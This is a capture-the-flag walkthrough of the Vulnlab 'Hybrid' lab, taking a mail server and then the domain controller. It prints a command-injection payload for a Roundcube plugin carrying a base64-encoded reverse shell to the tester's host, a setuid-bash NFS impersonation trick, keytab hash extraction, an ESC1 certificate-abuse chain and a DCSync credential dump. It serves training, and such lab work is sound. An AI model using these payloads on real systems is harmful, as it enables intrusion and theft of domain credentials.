Vulnlab - Hybrid (Chain) - Easy
Mail01.hybrid.vl
Initial Access
Let’s first enumerate the machine with a nmap scan. The goal here is to retrieve as much information as we can :
nmap -sV -sC -p- -A --max-retries 2 -n -T4 10.10.240.230
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-21 02:31 CET
NSE Timing: About 97.19% done; ETC: 02:32 (0:00:00 remaining)
Nmap scan report for 10.10.240.230
Host is up (0.023s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA)
|_ 256 a3b5d86106e63a418845e35203d2231b (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Redirecting...
|_http-server-header: nginx/1.18.0 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL TOP SASL STLS CAPA AUTH-RESP-CODE PIPELINING
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 40223/tcp mountd
| 100005 1,2,3 42464/udp mountd
| 100005 1,2,3 45045/udp6 mountd
| 100005 1,2,3 51159/tcp6 mountd
| 100021 1,3,4 40757/tcp nlockmgr
| 100021 1,3,4 43043/tcp6 nlockmgr
| 100021 1,3,4 43482/udp nlockmgr
| 100021 1,3,4 53344/udp6 nlockmgr
| 100024 1 34969/tcp status
| 100024 1 40381/udp6 status
| 100024 1 47130/udp status
| 100024 1 57021/tcp6 status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more capabilities post-login OK listed have SASL-IR STARTTLS Pre-login LOGIN-REFERRALS ID IDLE LOGINDISABLEDA0001 IMAP4rev1 LITERAL+ ENABLE
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
587/tcp open smtp Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: more capabilities post-login OK listed have SASL-IR AUTH=PLAIN AUTH=LOGINA0001 LOGIN-REFERRALS ENABLE IDLE Pre-login IMAP4rev1 LITERAL+ ID
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL TOP SASL(PLAIN LOGIN) USER CAPA AUTH-RESP-CODE PIPELINING
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs_acl 3 (RPC #100227)
34969/tcp open status 1 (RPC #100024)
40223/tcp open mountd 1-3 (RPC #100005)
40757/tcp open nlockmgr 1-4 (RPC #100021)
51431/tcp open mountd 1-3 (RPC #100005)
53971/tcp open mountd 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/21%OT=22%CT=1%CU=38962%PV=Y%DS=2%DC=T%G=Y%TM=67661A
OS:E5%P=aarch64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M4D4ST11NW7%O2=M4D4ST11NW7%O3=M4D4NNT11NW7%O4=M4D4ST11NW7%O5=
OS:M4D4ST11NW7%O6=M4D4ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F
OS:4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4D4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 21.88 ms 10.8.0.1
2 22.02 ms 10.10.240.230
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.95 seconds
We are facing a mail server. We can see some pretty interesting services like HTTP, NFS or even SMTP, IMAP and POP. I want to enumerate nfs to see if there is any available share that we can potentially mount :
showmount -e 10.10.240.230
Export list for 10.10.240.230:
/opt/share *
It looks nice ! let’s see if we can mount it to our attacking machine :
sudo mount -t nfs 10.10.240.230:/opt/share ./nfs -o nolock
Ok, that’s nice. in this shared folder there is a file backup.tar.gz, we then want to uncompress it :
tar -xvf backup.tar.gz
etc/passwd
etc/sssd/sssd.conf
etc/dovecot/dovecot-users
etc/postfix/main.cf
opt/certs/hybrid.vl/fullchain.pem
opt/certs/hybrid.vl/privkey.pem
Dovecot is an IMAP server, and we can see here that there is a file name dovecot-users where we can find two users :
cat dovecot-users
admin@hybrid.vl:{plain}REDACTED
peter.turner@hybrid.vl:{plain}REDACTED
Roundcube is an email Client, and we can access it on port 80 :
If we try to connect with the credentials discovered previously in the dovecot-users file, we can !
From here, I found nothing to do or to abuse. I decided to enumerate the version of roundcube to see if there is some CVE available. It was not the case for Roundcube, but it was for the plugin markasjunk
I really recommend you to read the article, it’s really interesting but to make a resume of it, it’s possible to perform command injection directly from the email entity.
Before directly trying to gain a reverse shell, we will try to see if our command can be executed, to do this test we can just open a web server and use a curl or wget. Let’s modify our email identity :
The next step is to send an email, to us for example, and then we need to mark the mail as junk. If you follow these steps, you’ll receive a connexion on the web server, meaning that our command injection is working!
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.240.230 - - [21/Dec/2024 03:42:06] "GET / HTTP/1.1" 200 -
It’s time to craft our payload ! I was not able to directly execute a command to gain a reverse shell because the web application don’t accept certain characters like " or > etc. I also tried to URL encode the command but it was not working, so the last solution was to base64 encode the command :
echo "sh -i >& /dev/tcp/10.8.2.242/443 0>&1" | base64
c2ggLWkgPiYgL2Rldi90Y3AvMTAuOC4yLjI0Mi80NDMgMD4mMQo=
The final payload will be that -> admin&echo${IFS}'c2ggLWkgPiYgL2Rldi90Y3AvMTAuOC4yLjI0Mi80NDMgMD4mMQ=='${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl
- We use echo to print out the base64 encoded command.
- We use
${IFS}to bypass space characters. - We use pipe to base64 decode our commands.
- We again use pipe to execute bash on the decoded commands, to obtain our reverse shell.
If we repeat the steps as we did previously (modify the entity with this payload, send an email and mark it as junk), we should obtain a reverse shell :
pwncat-cs :443
[04:18:28] Welcome to pwncat 🐈! __main__.py:164
[04:18:33] received connection from 10.10.239.214:56682 bind.py:84
[04:18:34] 0.0.0.0:443: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[04:18:35] 10.10.239.214:56682: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@mail01:/var/www/roundcube$
Lateral Movement
I want to be honest, this part was too tricky for me so I needed to ask for help, I’ll explain how it works, but keep in mind I didn’t found it by myself.
To find the attack path, we first need to take a look at the config file of the nfs share :
cat etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/opt/share *(rw,no_subtree_check)
The nice thing to retain here is that anybody have read and write permission on the share. The main idea with this info, is to understand that we will be able to impersonate the uid of the user peter.turner@hybrid.vl. We first need to grab his uid :
id peter.turner@hybrid.vl
uid=902601108(peter.turner@hybrid.vl) gid=902600513(domain users@hybrid.vl) groups=902600513(domain users@hybrid.vl),902601104(hybridusers@hybrid.vl)
On our attacking machine, we need to create a user with the same name and the same uid :
useradd -u 902601108 peter.turner@hybrid.vl
From the victim machine, we need to copy /bin/bash into the nfs share, the goal is to permit us to grab it from our attacking machine :
www-data@mail01:/opt/share$ cp /bin/bash .
On our attacking machine, we will switch to peter user, and we will copy the file anywhere on our machine. The goal is to put peter as owner of the file :
$ ls -la bash
-rwxr-xr-x 1 peter.turner@hybrid.vl peter.turner@hybrid.vl 1396520 21 déc. 04:57 bash
Then, we will copy bash again into the nfs share, and we will set the SID with chmod. By doing that, when we will use this bash, it will execute as the owner of the file, Peter :
$ cp bash /home/nfs/.
$ chmod +s /home/nfs/bash
Now, if we run bash with www-data, we will have the uid of Peter and we will able to access his home folder :
www-data@mail01:/opt/share$ /opt/share/bash -p
www-data@mail01:/opt/share$ id
uid=33(www-data) gid=33(www-data) euid=902601108(peter.turner@hybrid.vl) egid=1001 groups=1001,33(www-data)
www-data@mail01:/home/peter.turner@hybrid.vl$ ls -la
total 36
drwx------ 4 peter.turner@hybrid.vl domain users@hybrid.vl 4096 Jun 18 2023 .
drwxr-xr-x 3 root root 4096 Jun 17 2023 ..
lrwxrwxrwx 1 peter.turner@hybrid.vl domain users@hybrid.vl 9 Jun 17 2023 .bash_history -> /dev/null
-rw------- 1 peter.turner@hybrid.vl domain users@hybrid.vl 220 Jun 17 2023 .bash_logout
-rw------- 1 peter.turner@hybrid.vl domain users@hybrid.vl 3771 Jun 17 2023 .bashrc
drwx------ 2 peter.turner@hybrid.vl domain users@hybrid.vl 4096 Jun 17 2023 .cache
lrwxrwxrwx 1 peter.turner@hybrid.vl domain users@hybrid.vl 9 Jun 18 2023 .kpcli-history -> /dev/null
drwxr-xr-x 3 peter.turner@hybrid.vl domain users@hybrid.vl 4096 Jun 17 2023 .local
-rw------- 1 peter.turner@hybrid.vl domain users@hybrid.vl 807 Jun 17 2023 .profile
-rw-r--r-- 1 peter.turner@hybrid.vl domain users@hybrid.vl 37 Jun 17 2023 flag.txt
-rw-r--r-- 1 peter.turner@hybrid.vl domain users@hybrid.vl 1678 Jun 18 2023 passwords.kdbx
Note
Let’s make a quick recap :
- We created a user on our attacking machin with the same name and the same uid of Peter.
- We copied bash into the shared folder from the victim machine.
- From our attacking machine, we copied bash as Peter to put it as owner, and once done we copied it again into the shared folder.
- We set the SID with chmod, which permited us to execute bash in the context of the owner.
What an amazing abuse ! I recommend you to remind it.
Privilege Escalation
In the home folder of Peter, we find a KeePass database, let’s copy it to our attacking machine. I don’t know if you remember, but we found credentials in the dovecot-users file. If we use the creds of Peter, we can open the database and find credentials for peter.turner :
With this credential, we can connect through SSH to mail01 :
ssh peter.turner@hybrid.vl@10.10.239.214
(peter.turner@hybrid.vl@10.10.239.214) Password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Dec 21 04:59:10 AM UTC 2024
System load: 0.0 Processes: 147
Usage of /: 65.3% of 6.06GB Users logged in: 0
Memory usage: 33% IPv4 address for ens5: 10.10.239.214
Swap usage: 0%
=> There is 1 zombie process.
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
3 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Dec 21 04:59:11 2024 from 10.8.2.242
peter.turner@hybrid.vl@mail01:~$
If we run a basic sudo -l we can see that we are able to execute anything with sudo :
peter.turner@hybrid.vl@mail01:~$ sudo -l
[sudo] password for peter.turner@hybrid.vl:
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
We can then becom root of the machine :
peter.turner@hybrid.vl@mail01:~$ sudo /bin/bash -i
root@mail01:/home/peter.turner@hybrid.vl# id
uid=0(root) gid=0(root) groups=0(root)
DC01.hybrid.vl
Initial enumeration
Since we own a user, let’s run rusthound to collect datas from the DC and give these to BloodHound :
rusthound -d "hybrid.vl" -u "peter.turner"@"hybrid.vl" -p "REDACTED" --zip --ldaps --adcs --old-bloodhound
---------------------------------------------------
Initializing RustHound at 05:28:05 on 12/21/24
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2024-12-21T04:28:05Z INFO rusthound] Verbosity level: Info
[2024-12-21T04:28:05Z INFO rusthound::ldap] Connected to HYBRID.VL Active Directory!
[2024-12-21T04:28:05Z INFO rusthound::ldap] Starting data collection...
[2024-12-21T04:28:06Z INFO rusthound::ldap] All data collected for NamingContext DC=hybrid,DC=vl
[2024-12-21T04:28:06Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=hybrid,DC=vl
[2024-12-21T04:28:06Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 20% [2024-12-21T04:28:06Z INFO rusthound::modules::adcs::parser] Found 12 enabled certificate templates
[2024-12-21T04:28:06Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2024-12-21T04:28:06Z INFO rusthound::json::checker] Starting checker to replace some values...
[2024-12-21T04:28:06Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2024-12-21T04:28:06Z INFO rusthound::modules] Starting checker for ADCS values...
[2024-12-21T04:30:17Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://dc01.hybrid.vl/certsrv/, please try manually and check for https access if EPA is enable.
[2024-12-21T04:30:17Z INFO rusthound::modules] Checking for ADCS values finished!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 14 users parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 61 groups parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 2 computers parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 2 ous parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 1 domains parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 1 cas parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 34 templates parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 2 gpos parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 21 containers parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] .//20241221053017_hybrid-vl_rusthound.zip created!
Rusthound arguments
-d: is for the domain-u: is for the user-p: is for the password--zip: is to tell rusthound that we want all the .json in a zip--ldaps: is to use ldaps insteant of ldap--adcs: is to enumerate template--old-bloodhound: is to make the datas compatible with the legacy version of Bloodhound
I found some templates, but nothing I can do with Peter. I decided then to use Certipy to find if there is any vulnerable template in the domain :
certipy find -vulnerable -u "peter.turner@hybrid.vl" -p "REDACTED"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Saved BloodHound data to '20241221053557_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241221053557_Certipy.txt'
[*] Saved JSON output to '20241221053557_Certipy.json'
Certipy arguments
find: we use find to tell certipy we want to enumerate templatesvulnerable: we use this arguments to tell certipy we only want to return the vulnerable template it has found-u: specify the user used to enumeratep: password of the user
Let’s print out what certipy found :
cat 20241221053557_Certipy.json | jq
{
"Certificate Authorities": {
"0": {
"CA Name": "hybrid-DC01-CA",
"DNS Name": "dc01.hybrid.vl",
"Certificate Subject": "CN=hybrid-DC01-CA, DC=hybrid, DC=vl",
"Certificate Serial Number": "5C53FF4CA84C1F9C4A50351317ADBCB3",
"Certificate Validity Start": "2023-06-17 14:04:39+00:00",
"Certificate Validity End": "2124-12-21 03:14:07+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "HYBRID.VL\\Administrators",
"Access Rights": {
"2": [
"HYBRID.VL\\Administrators",
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins"
],
"1": [
"HYBRID.VL\\Administrators",
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins"
],
"512": [
"HYBRID.VL\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "HybridComputers",
"Display Name": "HybridComputers",
"Certificate Authorities": [
"hybrid-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"None"
],
"Private Key Flag": [
"16842752"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "100 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 4096,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Domain Computers",
"HYBRID.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "HYBRID.VL\\Administrator",
"Write Owner Principals": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins",
"HYBRID.VL\\Administrator"
],
"Write Dacl Principals": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins",
"HYBRID.VL\\Administrator"
],
"Write Property Principals": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins",
"HYBRID.VL\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC1": "'HYBRID.VL\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"
}
}
}
}
It seems that if we have in our posession a computer account, we can abuse ESC1 template and impersonate any upn we want.
Path to Domain Admins
On linux machines joined to the domain, the informations to authenticate through Kerberos are stored in keytab files. These files contains multiple informations like the Realm, the Service Principal or even the NTLM hash.
We can find a keytab file on Mail01.hybrid.vl :
root@mail01:/etc# ls -la | grep .keytab
-rw------- 1 root root 650 Jun 17 2023 krb5.keytab
To decrypt the informations stored in this file, we can use this tool :
python keytabextract.py ../krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : REDACTED
AES-256 HASH : REDACTED
AES-128 HASH : REDACTED
With the NTLM hash of Mail01.hybrid.vl in our hands, we can use certipy to request a certificate and impersonate any upn we want :
certipy req -u 'mail01$@hybrid.vl' -hashes :"REDACTED" -dc-ip "10.10.239.213" -target "dc01.hybrid.vl" -ca "hybrid-DC01-CA" -template "HybridComputers" -upn 'dc01$@hybrid.vl' -debug -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc01.hybrid.vl' at '10.10.239.213'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.239.213[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.239.213[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'dc01$@hybrid.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'dc01.pfx'
Certipy arguments
req: We tell to certipy that we are goind to make a request to the CA-u: Here we use the computer account, mail01-hashes: Yhis options allow us to use the NTLM hash-dc-ip: We specify the ip of the domain controller-target: We specify the FQDN of the domain controller-ca: We specify the Certificate Authorithy-template: We specify the template that we want to make a request-upn: We specify the UPN we want to impersonatekey-size: We specify the length of the key, this info can be found in the output of certipy when we enumerated the templates
Once done, we can again use Certipy to retrieve the hash of the account :
certipy auth -pfx "dc01.pfx" -dc-ip '10.10.239.213' -username 'DC01$' -domain 'hybrid.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: dc01$@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@hybrid.vl': REDACTED:REDACTED
We can then perform a DCSync attack, to retrieve the hash and aes keys of any account of the domain :
secretsdump -just-dc-user Administrator -hashes :"REDACTED" "hybrid.vl"/"DC01$"@"10.10.239.213"
Impacket v0.13.0.dev0+20241024.220713.de4ad10d - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:REDACTED:REDACTED:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:REDACTED
Administrator:aes128-cts-hmac-sha1-96:REDACTED
Administrator:des-cbc-md5:REDACTED
[*] Cleaning up...
Thank you for reading this Walkthrough, I hope you have learned some new techniques to write in your notes ! =)